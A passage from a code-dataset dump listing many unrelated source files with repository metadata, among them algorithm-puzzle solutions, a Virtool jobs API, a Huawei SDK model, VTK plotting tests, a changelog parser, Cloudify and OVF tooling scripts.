val_ptr += 1
current_ptr += 1
return val_ptr
sol = Solution()
a = [2,3,3]
print sol.removeElement(a,2)
print a | [
"zeostudio@gmail.com"
] | zeostudio@gmail.com |
5fba49f6abf7fd870f403d743c941edc418ac119 | 350db570521d3fc43f07df645addb9d6e648c17e | /1439_Find_the_Kth_Smallest_Sum_of_a_Matrix_With_Sorted_Rows/solution.py | 410bee6160c17cc3dcfb17136fda39f7cf4af231 | [] | no_license | benjaminhuanghuang/ben-leetcode | 2efcc9185459a1dd881c6e2ded96c42c5715560a | a2cd0dc5e098080df87c4fb57d16877d21ca47a3 | refs/heads/master | 2022-12-10T02:30:06.744566 | 2022-11-27T04:06:52 | 2022-11-27T04:06:52 | 236,252,145 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 277 | py | '''
1439. Find the Kth Smallest Sum of a Matrix With Sorted Rows
Level: Hard
https://leetcode.com/problems/find-the-kth-smallest-sum-of-a-matrix-with-sorted-rows
'''
'''
Solution:
'''
class Solution:
def kthSmallest(self, mat: List[List[int]], k: int) -> int:
| [
"benjaminhuanghuang@gmail.com"
] | benjaminhuanghuang@gmail.com |
4eac8110cbbd1dda68c1f2fefbb625f8e9167722 | 6fa0d5d3b61fbce01fad5a7dd50258c09298ee00 | /Algorithm/BOJ/2754.py | 57138e66826228ebad25635ac3866d1e5de91457 | [] | no_license | athletejuan/TIL | c8e6bd9f7e2c6f999dbac759adcdb6b2959de384 | 16b854928af2f27d91ba140ebc1aec0007e5eb04 | refs/heads/master | 2023-02-19T13:59:06.495110 | 2022-03-23T15:08:04 | 2022-03-23T15:08:04 | 188,750,527 | 1 | 0 | null | 2023-02-15T22:54:50 | 2019-05-27T01:27:09 | Python | UTF-8 | Python | false | false | 181 | py | C = input()
credit = {'A+': 4.3, 'A0': 4.0, 'A-': 3.7, 'B+': 3.3, 'B0': 3.0, 'B-': 2.7, 'C+': 2.3, 'C0': 2.0, 'C-': 1.7, 'D+': 1.3, 'D0': 1.0, 'D-': 0.7, 'F': 0.0}
print(credit[C]) | [
"vanillasky84.0627@gmail.com"
] | vanillasky84.0627@gmail.com |
446e368dfaaedf1674c3ed268346ea05f820c598 | b662fcc29eda65211bccef35fbe42f5a072986c5 | /pysm/transformation/models/scope.py | 06d7849413eb18afa2962a0377db2e4826224b1d | [
"MIT"
] | permissive | binh-vu/semantic-modeling | 08edb87ed36724046049e1caf10a6cb3da69ccaf | b387584502ba1daa6abd6b7573828416f6426b49 | refs/heads/master | 2022-01-09T10:24:08.840566 | 2019-05-11T06:09:30 | 2019-05-11T06:09:30 | 186,094,653 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,359 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
from typing import Dict, Tuple, List, Set, Union, Optional
from transformation.models.table_schema import Schema
class Scope:
def __init__(self, path: str):
self.path = path
if path == "":
self.attr_paths = []
else:
self.attr_paths = path.split(Schema.PATH_DELIMITER)
def is_outer_scope_of(self, scope: 'Scope') -> bool:
return scope.path.startswith(self.path) and scope.path != self.path
def is_same_scope(self, scope: 'Scope') -> bool:
return scope.path == self.path
def get_parent(self):
return Scope(Schema.PATH_DELIMITER.join(self.attr_paths[:-1]))
def get_inner_scope(self):
assert len(self.attr_paths) > 0
return Scope(Schema.PATH_DELIMITER.join(self.attr_paths[1:]))
def contain_path(self, path: str):
return path.startswith(self.path)
def get_relative_path(self, path: str):
if self.path == "":
return path
return path[len(self.path)+1:]
def get_relative_path2scope(self, scope: 'Scope'):
"""Return a relative path to another scope"""
return scope.attr_paths[len(self.attr_paths):]
def extract_data(self, global_row: dict):
if self.path == "":
return global_row
return _extract_data(self.attr_paths, global_row)
def __eq__(self, other):
if other is None or not isinstance(other, Scope):
return False
return self.path == other.path
def __lt__(self, other):
if other is None or not isinstance(other, Scope):
raise NotImplementedError()
return other.path.startswith(self.path) and other.path != self.path
def __gt__(self, other):
if other is None or not isinstance(other, Scope):
raise NotImplementedError()
return self.path.startswith(other.path) and other.path != self.path
def __repr__(self):
return self.path
def _extract_data(attr_paths: List[str], local_row: dict):
attr = attr_paths[0]
if len(attr_paths) == 1:
return local_row[attr]
for attr in attr_paths:
if isinstance(local_row[attr], list):
return [_extract_data(attr_paths[1:], val) for val in local_row[attr]]
return _extract_data(attr_paths[1:], local_row[attr])
| [
"binh@toan2.com"
] | binh@toan2.com |
97f4d4bf6bbeea91ac82ddf267e8c6fc3e00e32a | 4fe68a329da64dceef27b4f62dcde538e07ea3e0 | /109.py | b697c5c7fc08aa9c5037fc713f60c654bad6da5a | [] | no_license | LiuXPeng/leetcode | 9bf18a8c86952e12d8ca2032793d2abfe918a730 | 1d583df4089e1678996f481fa1a903b22ff43182 | refs/heads/master | 2020-03-20T00:52:01.736500 | 2018-07-26T03:25:04 | 2018-07-26T03:25:04 | 137,058,642 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 966 | py | # Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def sortedListToBST(self, head):
"""
:type head: ListNode
:rtype: TreeNode
"""
if not head:
return
tag = head
count = 1 #让count多一个
while tag:
tag = tag.next
count += 1
if count == 2:
return TreeNode(head.val)
if count == 3:
res = TreeNode(head.next.val)
res.left = TreeNode(head.val)
return res
k = count // 2
tag = head
for i in range(0, k - 2):
tag = tag.next
temp = tag.next
res = TreeNode(temp.val)
tag.next = None
res.left = self.sortedListToBST(head)
res.right = self.sortedListToBST(temp.next)
return res | [
"LiuXPeng@users.noreply.github.com"
] | LiuXPeng@users.noreply.github.com |
c05c576d43957856efff8eecd62f30a51faddc53 | 3b1053ea38fee9a59d335dd75bb6a6906d298594 | /virtool/jobs/api.py | 0167f78f13fd311dd71976150a0e196319ee992b | [
"MIT"
] | permissive | tianshengsui/virtool | 8c59bb36c7e2924586be34fabc6b861e16691b7d | eb75637eb6ca9dcba647ad8acad5d316877dd55e | refs/heads/master | 2023-04-19T16:36:54.894894 | 2021-04-23T19:09:33 | 2021-04-23T19:09:33 | 295,793,679 | 0 | 0 | MIT | 2020-09-30T23:53:54 | 2020-09-15T16:55:59 | null | UTF-8 | Python | false | false | 3,295 | py | import os
import virtool.api.utils
import virtool.http.routes
import virtool.jobs.db
import virtool.resources
import virtool.users.db
import virtool.utils
from virtool.api.response import conflict, json_response, no_content, not_found
routes = virtool.http.routes.Routes()
@routes.get("/api/jobs")
async def find(req):
"""
Return a list of job documents.
"""
db = req.app["db"]
term = req.query.get("find")
db_query = dict()
if term:
db_query.update(virtool.api.utils.compose_regex_query(term, ["task", "user.id"]))
data = await virtool.api.utils.paginate(
db.jobs,
db_query,
req.query,
projection=virtool.jobs.db.PROJECTION
)
data["documents"].sort(key=lambda d: d["created_at"])
return json_response(data)
@routes.get("/api/jobs/{job_id}")
async def get(req):
"""
Return the complete document for a given job.
"""
job_id = req.match_info["job_id"]
document = await req.app["db"].jobs.find_one(job_id)
if not document:
return not_found()
return json_response(virtool.utils.base_processor(document))
@routes.put("/api/jobs/{job_id}/cancel", permission="cancel_job")
async def cancel(req):
"""
Cancel a job.
"""
db = req.app["db"]
job_id = req.match_info["job_id"]
document = await db.jobs.find_one(job_id, ["status"])
if not document:
return not_found()
if not virtool.jobs.is_running_or_waiting(document):
return conflict("Not cancellable")
await req.app["jobs"].cancel(job_id)
document = await db.jobs.find_one(job_id)
return json_response(virtool.utils.base_processor(document))
@routes.delete("/api/jobs", permission="remove_job")
async def clear(req):
db = req.app["db"]
job_filter = req.query.get("filter")
# Remove jobs that completed successfully.
complete = job_filter in [None, "finished", "complete"]
# Remove jobs that errored or were cancelled.
failed = job_filter in [None, "finished", "failed"]
removed = await virtool.jobs.db.clear(db, complete=complete, failed=failed)
return json_response({
"removed": removed
})
@routes.delete("/api/jobs/{job_id}", permission="remove_job")
async def remove(req):
"""
Remove a job.
"""
db = req.app["db"]
job_id = req.match_info["job_id"]
document = await db.jobs.find_one(job_id)
if not document:
return not_found()
if virtool.jobs.is_running_or_waiting(document):
return conflict("Job is running or waiting and cannot be removed")
# Removed the documents associated with the job ids from the database.
await db.jobs.delete_one({"_id": job_id})
try:
# Calculate the log path and remove the log file. If it exists, return True.
path = os.path.join(req.app["settings"]["data_path"], "logs", "jobs", job_id + ".log")
await req.app["run_in_thread"](virtool.utils.rm, path)
except OSError:
pass
return no_content()
@routes.get("/api/resources")
async def get_resources(req):
"""
Get a object describing compute resource usage on the server.
"""
resources = virtool.resources.get()
req.app["resources"].update(resources)
return json_response(resources)
| [
"igboyes@gmail.com"
] | igboyes@gmail.com |
0a55920724eb79f070f95f641c0239ee7ab5f1e2 | f9d564f1aa83eca45872dab7fbaa26dd48210d08 | /huaweicloud-sdk-iotanalytics/huaweicloudsdkiotanalytics/v1/model/raw_value.py | c8334c0dd5a90195b94e73878d1c4f0eef47f204 | [
"Apache-2.0"
] | permissive | huaweicloud/huaweicloud-sdk-python-v3 | cde6d849ce5b1de05ac5ebfd6153f27803837d84 | f69344c1dadb79067746ddf9bfde4bddc18d5ecf | refs/heads/master | 2023-09-01T19:29:43.013318 | 2023-08-31T08:28:59 | 2023-08-31T08:28:59 | 262,207,814 | 103 | 44 | NOASSERTION | 2023-06-22T14:50:48 | 2020-05-08T02:28:43 | Python | UTF-8 | Python | false | false | 3,922 | py | # coding: utf-8
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class RawValue:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'property_name': 'str',
'values': 'list[object]'
}
attribute_map = {
'property_name': 'property_name',
'values': 'values'
}
def __init__(self, property_name=None, values=None):
"""RawValue
The model defined in huaweicloud sdk
:param property_name: 属性名称
:type property_name: str
:param values: 资产属性的历史值序列,示例:[1,2]
:type values: list[object]
"""
self._property_name = None
self._values = None
self.discriminator = None
if property_name is not None:
self.property_name = property_name
if values is not None:
self.values = values
@property
def property_name(self):
"""Gets the property_name of this RawValue.
属性名称
:return: The property_name of this RawValue.
:rtype: str
"""
return self._property_name
@property_name.setter
def property_name(self, property_name):
"""Sets the property_name of this RawValue.
属性名称
:param property_name: The property_name of this RawValue.
:type property_name: str
"""
self._property_name = property_name
@property
def values(self):
"""Gets the values of this RawValue.
资产属性的历史值序列,示例:[1,2]
:return: The values of this RawValue.
:rtype: list[object]
"""
return self._values
@values.setter
def values(self, values):
"""Sets the values of this RawValue.
资产属性的历史值序列,示例:[1,2]
:param values: The values of this RawValue.
:type values: list[object]
"""
self._values = values
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, RawValue):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"hwcloudsdk@huawei.com"
] | hwcloudsdk@huawei.com |
06c2eca239012d6d77d4c43bd14eb9ece6e2e980 | 5a6937aa6cea8312bc8964f86f77f4595d1b940f | /Testing/test_mypoints_plot2.py | 54c7c5566745e968ea82108d41f131f4c0c5c225 | [] | no_license | emonson/MultiScaleSVD | 39d8059f3f286a1936c6634740d1bd1e87ddbc7f | c231859bffe1eb0a7eaf15fd4d1a4c8ca9cfe8ed | refs/heads/master | 2020-12-24T13:17:53.369613 | 2012-12-19T18:09:39 | 2012-12-19T18:09:39 | 699,727 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,206 | py | # Translated to Python from [VTK]/Charts/Testing/Cxx/TestLinePlot.cxx
# This version is for testing reworked subclasses 8/13/2010
import vtk
from vtk.util import numpy_support as VN
import numpy as N
import math
import vtkvtg
from data_source import DataSource
data_file = '/Users/emonson/Data/Fodava/EMoGWDataSets/mnist12_1k_20101119.mat'
# DataSource loads .mat file and can generate data from it for other views
ds = DataSource(data_file)
# Set up a 2D scene, add an XY chart to it
view = vtk.vtkContextView()
view.GetRenderWindow().SetSize(400, 300)
# Testing my custom chart class which has image hover tooltips
chart = vtkvtg.vtkMyChartXY()
chart.SetActionToButton(vtk.vtkChart.PAN, 2)
chart.SetActionToButton(vtk.vtkChart.ZOOM, 4)
chart.SetActionToButton(vtk.vtkChart.SELECT, 1)
view.GetScene().AddItem(chart)
# Create a annotation link to access selection in parallel coordinates view
annotationLink = vtk.vtkAnnotationLink()
# If you don't set the FieldType explicitly it ends up as UNKNOWN (as of 21 Feb 2010)
# See vtkSelectionNode doc for field and content type enum values
annotationLink.GetCurrentSelection().GetNode(0).SetFieldType(1) # Point
annotationLink.GetCurrentSelection().GetNode(0).SetContentType(4) # Indices
# Connect the annotation link to the parallel coordinates representation
chart.SetAnnotationLink(annotationLink)
test_id = 3
table = ds.GetNodeOneScaleCoeffTable(test_id)
chart.ClearPlots()
line1 = vtkvtg.vtkMyPlotPoints()
chart.AddPlot(line1) # POINTS
line1.SetInput(table, 0, 1)
line1.SetMarkerStyle(2)
line1.SetColor(0, 0, 0, 255)
# Tooltip image stack will now be owned by the tooltip, so need to do that differently...
id_list = ds.PointsInNet[test_id]
image_stack = ds.GetProjectedImages(id_list)
# DEBUG
writer = vtk.vtkXMLImageDataWriter()
writer.SetFileName('out.vti')
writer.SetInput(image_stack)
writer.Write()
chart.SetTooltipImageStack(image_stack)
chart.SetTooltipShowImage(True)
# chart.SetTooltipImageScalingFactor(2.0)
chart.SetTooltipImageTargetSize(40)
# Set up annotation link which will carry indices to parallel coordinates chart
# for highlighting outside selections (e.g. back from image_flow)
# This needs to carry indices, while image_flow link outputs pedigree ids
# so conversion happens in HighlightSelectionCallback
highlight_link_idxs = vtk.vtkAnnotationLink()
highlight_link_idxs.GetCurrentSelection().GetNode(0).SetFieldType(1) # Point
highlight_link_idxs.GetCurrentSelection().GetNode(0).SetContentType(4) # 2 = PedigreeIds, 4 = Indices
chart.SetHighlightLink(highlight_link_idxs)
# Finally render the scene and compare the image to a reference image
# view.GetRenderWindow().SetMultiSamples(0)
def selectionCallback(caller, event):
annSel = annotationLink.GetCurrentSelection()
if annSel.GetNumberOfNodes() > 0:
idxArr = annSel.GetNode(0).GetSelectionList()
if idxArr.GetNumberOfTuples() > 0:
print VN.vtk_to_numpy(idxArr)
annotationLink.AddObserver("AnnotationChangedEvent",selectionCallback)
# view.ResetCamera()
view.Render()
# Fill selection link with dummy IDs
id_array = N.array([0],dtype='int64')
id_list = VN.numpy_to_vtkIdTypeArray(id_array)
highlight_link_idxs.GetCurrentSelection().GetNode(0).SetSelectionList(id_list)
highlight_link_idxs.InvokeEvent("AnnotationChangedEvent")
# Set up annotation link which will carry indices to parallel coordinates chart
# for highlighting outside selections (e.g. back from image_flow)
# This needs to carry indices, while image_flow link outputs pedigree ids
# so conversion happens in HighlightSelectionCallback
data_col_idxs = vtk.vtkAnnotationLink()
data_col_idxs.GetCurrentSelection().GetNode(0).SetFieldType(1) # Point
data_col_idxs.GetCurrentSelection().GetNode(0).SetContentType(4) # 2 = PedigreeIds, 4 = Indices
chart.SetDataColumnsLink(data_col_idxs)
# Fill selection link with dummy IDs
col_array = N.array([1,2],dtype='int64')
col_list = VN.numpy_to_vtkIdTypeArray(col_array)
data_col_idxs.GetCurrentSelection().GetNode(0).SetSelectionList(col_list)
data_col_idxs.InvokeEvent("AnnotationChangedEvent")
# Start interaction event loop
view.GetInteractor().Start()
| [
"emonson@cs.duke.edu"
] | emonson@cs.duke.edu |
63fcd4d76ce8b2403bd98acdaf30ee839d32b68d | 8337bfdd69708f4bfbe345240dcccc7b8c7f5718 | /loglette/parser/loglette/parser.py | 7e501e1c1f1c862b4151be8d842b3feac3762e3d | [
"MIT"
] | permissive | siku2/Loglette | 8f1c12ceb7f1009b5eab503ab7608b292be98739 | d69f99c3ead2bb24f2aa491a61a7f82cb9ca8095 | refs/heads/master | 2020-03-24T07:10:26.454200 | 2018-08-01T13:01:02 | 2018-08-01T13:01:02 | 142,555,185 | 1 | 0 | MIT | 2018-08-01T13:01:03 | 2018-07-27T09:12:51 | Python | UTF-8 | Python | false | false | 1,705 | py | from typing import Dict, List, Tuple
from . import pattern
from .. import Parser, parser
@parser("loglette")
class LogletteParser(Parser):
@classmethod
def parse_value(cls, value: str, text_style: str = None) -> str:
if text_style:
if text_style == "|":
value = value.strip()
elif text_style == ">":
value = pattern.WHITESPACE_STRIPPER.sub(" ", value).strip()
else:
raise SyntaxError(f"Unknown text style ({text_style})")
return value
def parse_header(self, text: str) -> Dict[str, str]:
headers = {}
for match in pattern.HEADER_PARSER.finditer(text):
key, text_style, value = match.groups(None)
value = self.parse_value(value, text_style)
headers[key] = value
headers["release_date"] = headers.get("release")
return headers
def parse_changes(self, text: str) -> List[Dict[str, str]]:
changes = []
for match in pattern.CHANGES_PARSER.finditer(text):
change_type, priority, text_style, value = match.groups(None)
text = self.parse_value(value, text_style)
change = {
"type": change_type.upper(),
"priority": priority,
"text": text
}
changes.append(change)
return changes
@classmethod
def split_changelog(cls, text: str) -> Tuple[str, str]:
header, changes = pattern.HEADER_SPLITTER.split(text, maxsplit=1)
return header, changes
@classmethod
def split_changelogs(cls, text: str) -> List[str]:
return pattern.CHANGELOG_SPLITTER.split(text)
| [
"siku2@outlook.com"
] | siku2@outlook.com |
84c46959396968ef4f12dd949fddc9e19ebf9cf9 | 41f13d82b46b158c5c2997915122e4f5e8a700fa | /falcon/main/views/things.py | ba065c6c1f18b0ea2b7e65e393bbb668750a72b1 | [] | no_license | ashishRay12/server | 0959e2e5789f886b327f51a83487fd3919593b22 | bb68c14398390e004148e848df234277f382a50c | refs/heads/master | 2021-01-10T13:58:43.307036 | 2016-03-21T16:10:35 | 2016-03-21T16:10:35 | 54,403,543 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 572 | py | import falcon
class ThingsResource:
def on_get(self, req, resp,form={},files={}):
"""Handles GET requests"""
resp.status = falcon.HTTP_200 # This is the default status
resp.body = ("GET request accepted")
def on_post(self, req, resp,form={},files={}):
"""Handles GET requests"""
resp.status = falcon.HTTP_200 # This is the default status
#resp.content_type = 'application/text'
#print(form["id"]) -> value captured from hook defined in common.py
resp.body = ("POST request accepted")
| [
"johndoe@example.com"
] | johndoe@example.com |
8145c8f75fc9b4722eb29c669bff3aba2ff807e5 | 1ffcad5482a95e8133b0adbd5fb38652c765a7d6 | /COT/remove_file.py | 0354f162faa9788f18e5031217ff5a01cce74652 | [
"MIT"
] | permissive | duanshuaimin/cot | 71f51d1270de2609c99ac302ed932d4c72e83c77 | 6da4345f57849620765e88d1e406366509070745 | refs/heads/master | 2021-01-21T06:38:45.458816 | 2017-02-21T15:13:09 | 2017-02-21T15:13:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,428 | py | #!/usr/bin/env python
#
# remove_file.py - Implements "cot remove-file" command
#
# June 2016, Glenn F. Matthews
# Copyright (c) 2016 the COT project developers.
# See the COPYRIGHT.txt file at the top-level directory of this distribution
# and at https://github.com/glennmatthews/cot/blob/master/COPYRIGHT.txt.
#
# This file is part of the Common OVF Tool (COT) project.
# It is subject to the license terms in the LICENSE.txt file found in the
# top-level directory of this distribution and at
# https://github.com/glennmatthews/cot/blob/master/LICENSE.txt. No part
# of COT, including this file, may be copied, modified, propagated, or
# distributed except according to the terms contained in the LICENSE.txt file.
"""Module for removing files from VM definitions.
.. autosummary::
COTRemoveFile
"""
import logging
from COT.submodule import COTSubmodule
from COT.data_validation import check_for_conflict, match_or_die
from COT.data_validation import InvalidInputError
logger = logging.getLogger(__name__)
class COTRemoveFile(COTSubmodule):
"""Remove a file (such as a README) from the package.
Inherited attributes:
:attr:`~COTGenericSubmodule.ui`,
:attr:`~COTSubmodule.package`,
:attr:`~COTSubmodule.output`
Attributes:
:attr:`file_path`,
:attr:`file_id`
"""
def __init__(self, ui):
"""Instantiate this submodule with the given UI.
Args:
ui (UI): User interface instance.
"""
super(COTRemoveFile, self).__init__(ui)
self.file_path = None
"""File name or path to be removed from the package."""
self.file_id = None
"""File identifier to be removed from the package."""
def ready_to_run(self):
"""Check whether the module is ready to :meth:`run`.
Returns:
tuple: ``(True, ready_message)`` or ``(False, reason_why_not)``
"""
if self.file_path is None and self.file_id is None:
return False, "No file information provided!"
return super(COTRemoveFile, self).ready_to_run()
def run(self):
"""Do the actual work of this submodule.
Raises:
InvalidInputError: if :func:`ready_to_run` reports ``False``
"""
super(COTRemoveFile, self).run()
vm = self.vm
# Find the existing file entry.
# There may also be a disk entry for this file.
# There may also be a disk device that maps this file to a drive.
(file1, disk1, _, disk_dev1) = vm.search_from_filename(self.file_path)
(file2, disk2, _, disk_dev2) = vm.search_from_file_id(self.file_id)
file_obj = check_for_conflict("file to remove", [file1, file2])
disk = check_for_conflict("disk associated with file to remove",
[disk1, disk2])
disk_drive = check_for_conflict("disk drive mapping this file",
[disk_dev1, disk_dev2])
if file_obj is None:
raise InvalidInputError("No such file found")
if self.file_id is None:
self.file_id = vm.get_id_from_file(file_obj)
else:
match_or_die('--file-id', self.file_id,
'file id in OVF', vm.get_id_from_file(file_obj))
if self.file_path is None:
self.file_path = vm.get_path_from_file(file_obj)
else:
match_or_die('--file-path', self.file_path,
'file path in OVF', vm.get_path_from_file(file_obj))
prompt_info = "file '{0}' (ID '{1}')".format(self.file_path,
self.file_id)
if disk is not None:
prompt_info += " and disk '{0}'".format(vm.get_id_from_disk(disk))
if disk_drive is not None:
prompt_info += " and device '{0}'".format(
vm.device_info_str(disk_drive))
self.ui.confirm_or_die("Remove {0}?".format(prompt_info))
vm.remove_file(file_obj, disk=disk,
disk_drive=disk_drive)
def create_subparser(self):
"""Create 'remove-file' CLI subparser."""
p = self.ui.add_subparser(
'remove-file',
aliases=['delete-file'],
add_help=False,
usage=self.ui.fill_usage("remove-file", [
"[-f FILE_PATH] [-i FILE_ID] PACKAGE [-o OUTPUT]",
]),
help="Remove a file from an OVF package",
description="""
Remove a file from the given OVF. Will prompt for confirmation unless
--force is set.""")
group = p.add_argument_group("general options")
group.add_argument('-h', '--help', action='help',
help="""Show this help message and exit""")
group.add_argument('-o', '--output',
help="""Name/path of new OVF/OVA package to """
"""create instead of updating the existing OVF""")
group = p.add_argument_group("file selection options")
group.add_argument('-f', '--file-path',
help="""File name or path within the package""")
group.add_argument('-i', '--file-id',
help="""File ID string within the package""")
p.add_argument('PACKAGE',
help="""Package, OVF descriptor or OVA file to edit""")
p.set_defaults(instance=self)
| [
"glenn@e-dad.net"
] | glenn@e-dad.net |
a1e1e36aac226ae6fb4c681d891bb90b5b64a966 | b9a86fac908ef196537f3e86bbf1776056e0354f | /gatifore_snmp/scripts/append_diamond_conf.py | 0611f0a49c8085d13c79f5258fb328dc33a9e9b4 | [] | no_license | tamirko/cfyApps | a2ff8514a6591f004a0d57cb1feaad5b267e7f75 | d7f9b751bc7d1c7bf3d07c36e6f9737c83bd1c78 | refs/heads/master | 2021-01-17T00:53:14.475503 | 2017-11-28T08:09:34 | 2017-11-28T08:09:34 | 26,909,041 | 1 | 4 | null | null | null | null | UTF-8 | Python | false | false | 2,161 | py | from cloudify import ctx
from cloudify.state import ctx_parameters as inputs
APPEND_DIAMOND_STR = "append_diamond_conf"
ctx.logger.info("Starting {0} ... ".format(APPEND_DIAMOND_STR))
target_instance = ctx.target.instance
ctx.logger.info("{0} target_instance {1} ... ".format(APPEND_DIAMOND_STR, target_instance))
target_node = ctx.target.node
ctx.logger.info("{0} target_node {1} ... ".format(APPEND_DIAMOND_STR, target_node))
src_instance = ctx.source.instance
ctx.logger.info("{0} src_instance {1} ... ".format(APPEND_DIAMOND_STR, src_instance))
ctx.logger.info("{0} ctx.target.node.name {1} ... ".format(APPEND_DIAMOND_STR, ctx.target.node.name))
config = src_instance.runtime_properties.get('snmp_collector_config', {})
for key, val in config.items():
if isinstance(val, dict):
ctx.logger.info(" {0} config.{1} b4 -> ... ".format(APPEND_DIAMOND_STR, key))
for k, v in val.items():
ctx.logger.info(" {0} config.{1} b4 -> {2}:{3} ... ".format(APPEND_DIAMOND_STR, key, k, v))
else:
ctx.logger.info("{0} config b4 -> {1}:{2} ... ".format(APPEND_DIAMOND_STR, key, str(val)))
devices_conf = config.get('devices', {})
devices_conf[ctx.target.node.name] = device_config = {}
device_config['node_instance_id'] = target_instance.id
device_config['node_id'] = target_node.id
if 'host' in inputs:
device_config['host'] = inputs.host
else:
device_config['host'] = target_instance.host_ip
ctx.logger.info("xxx {0} host is {1} ... yyy".format(APPEND_DIAMOND_STR, device_config['host']))
device_config['port'] = inputs.port
device_config['community'] = inputs.community
device_config['oids'] = inputs.oids
config['devices'] = devices_conf
for key, val in config.items():
if isinstance(val, dict):
ctx.logger.info(" {0} config.{1} after -> ... ".format(APPEND_DIAMOND_STR, key))
for k, v in val.items():
ctx.logger.info(" {0} config.{1} after -> {2}:{3} ... ".format(APPEND_DIAMOND_STR, key, k, v))
else:
ctx.logger.info("{0} config after -> {1}:{2} ... ".format(APPEND_DIAMOND_STR, key, str(val)))
src_instance.runtime_properties['snmp_collector_config'] = config
| [
"tamir@gigaspaces.com"
] | tamir@gigaspaces.com |
25c50028e507c050a5742263271cfb361423e81d | c2f6722d51f119b9f588cbea4121d2f8fddafcd2 | /bdv/code/procdistrib/clnt_processes.py | 4ba0c9d0a721669c97972e490f425b8b7b113ac3 | [] | no_license | facundobatista/blog | f4c670b48b52b0e651c7a89ad9de702abd16a39c | 4461457c185ef3949e0d6b1398b0a7feb4a68cde | refs/heads/master | 2023-07-09T09:02:17.503586 | 2023-07-04T00:36:22 | 2023-07-04T00:36:22 | 30,439,511 | 3 | 0 | null | 2019-01-24T15:43:51 | 2015-02-07T00:33:57 | PHP | UTF-8 | Python | false | false | 634 | py | import xmlrpclib, time, sys
import reparteThreads
#reparteThreads.debugmode = True
usage = """
Usar client_processes.py sever:port [[server:port] ...]
ej: client_processes.py localhost:9000 10.12.33.112:9000 10.12.33.113:9000
"""
if len(sys.argv) < 2:
print usage
sys.exit(-1)
servers = sys.argv[1:]
servers = [xmlrpclib.Server('http://' + x) for x in servers]
repartidor = reparteThreads.Repartidor(servers, "factoriz_sum")
base = 23434252232434
tini = time.time()
for i in range(10):
repartidor.enviar(str(base+i))
resultados = repartidor.terminar()
print "\n".join(resultados)
print "Tiempo:", time.time() - tini
| [
"facundo@taniquetil.com.ar"
] | facundo@taniquetil.com.ar |
6143d20eef5d2414ba5d2734ab41250ff4d2ef98 | 477eae855f1f295c7ade594ee64fc3501ac59ef9 | /recipes/D/test_package/conanfile.py | 4bb3be2882b9b6c86b50ae84192ed0ea228efe0c | [] | no_license | xingao0803/skynet_example | b5fa8e2f5dac0066c773bf9624e803105787ed5c | f955dde1041ef264dc33e239771190755b43104a | refs/heads/master | 2020-03-31T08:07:30.670256 | 2018-10-13T03:13:29 | 2018-10-13T03:13:29 | 152,046,747 | 0 | 1 | null | 2018-10-08T08:43:38 | 2018-10-08T08:43:38 | null | UTF-8 | Python | false | false | 334 | py | from conans import ConanFile
import os
channel = os.getenv("CONAN_CHANNEL", "stable")
username = os.getenv("CONAN_USERNAME", "lasote")
class BTestConan(ConanFile):
settings = "os", "compiler", "build_type", "arch"
requires = "LIB_D/1.0@%s/%s" % (username, channel)
def test(self):
self.output.info("Test OK!") | [
"lasote@gmail.com"
] | lasote@gmail.com |
d417d2e64005189a9b67e0af6c9b3badc1fb0ef0 | 55c250525bd7198ac905b1f2f86d16a44f73e03a | /Python/Games/Tetris/modules/gameboard.py | d279d17889bfea61c36f40ae050f4df4273e990a | [] | no_license | NateWeiler/Resources | 213d18ba86f7cc9d845741b8571b9e2c2c6be916 | bd4a8a82a3e83a381c97d19e5df42cbababfc66c | refs/heads/master | 2023-09-03T17:50:31.937137 | 2023-08-28T23:50:57 | 2023-08-28T23:50:57 | 267,368,545 | 2 | 1 | null | 2022-09-08T15:20:18 | 2020-05-27T16:18:17 | null | UTF-8 | Python | false | false | 129 | py | version https://git-lfs.github.com/spec/v1
oid sha256:9408a572aa27ab62fce8357d7b6c321f2df4cfaf6de7a27be290c97d70f3178a
size 8445
| [
"nateweiler84@gmail.com"
] | nateweiler84@gmail.com |
ea659a93d51874fb9441c1e921808db5c68cdfe4 | 6e601105760f09d3c9f5306e18e4cf085f0bb4a2 | /1000-9999/1449.py | 9e9b7eaf20d4ff4f2f80aa9e6ca37c6e2ba89700 | [] | no_license | WSJI0/BOJ | 6412f69fddd46c4bcc96377e2b6e013f3bb1b524 | 160d8c13f72d7da835d938686f433e7b245be682 | refs/heads/master | 2023-07-06T15:35:50.815021 | 2023-07-04T01:39:48 | 2023-07-04T01:39:48 | 199,650,520 | 2 | 0 | null | 2020-04-20T09:03:03 | 2019-07-30T12:48:37 | Python | UTF-8 | Python | false | false | 221 | py | '''
1449번
수리공 항승
'''
import sys
input=sys.stdin.readline
n, l=map(int, input().split())
a=list(map(int, input().split()))
a.sort()
L=0
cnt=0
for R in a:
if L<R:
L=R+l-1
cnt+=1
print(cnt) | [
"lifedev@naver.com"
] | lifedev@naver.com |
